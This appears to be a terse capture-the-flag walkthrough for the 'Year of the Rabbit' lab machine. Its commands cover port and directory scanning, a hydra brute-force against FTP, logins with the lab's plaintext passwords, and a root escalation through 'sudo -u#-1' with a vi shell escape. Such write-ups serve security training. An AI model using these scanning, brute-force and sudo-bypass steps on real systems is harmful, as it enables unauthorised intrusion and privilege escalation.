Year of the Rabbit
Last updated
Last updated
nmap -sV -sT -O -p 1-65535 $VICTIMgobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txtEnter about:config into the search bar and select Accept the Risk and Continue.
Enter javascript.enabled into the search box at the top of the page.
Select the javascript.enabled toggle to change the value to false.strings Hot_Babe.png hydra -l ftpuser -P passwords.txt ftp://$VICTIMftp $VICTIM
password: 5iez1wGXKfPKQssh eli@$VICTIM
Password: DSpDiM1wAEwidlocate s3cr3t
cat cat /usr/games/s3cr3t/.th1s_m3ss4ag3_15_f0r_gw3nd0l1n3_0nly\! su gwendoline
Password: MniVCQVhQHUNIsudo -u#-1 /usr/bin/vi /home/gwendoline/user.txt
#While vi is open run:
:!/bin/sh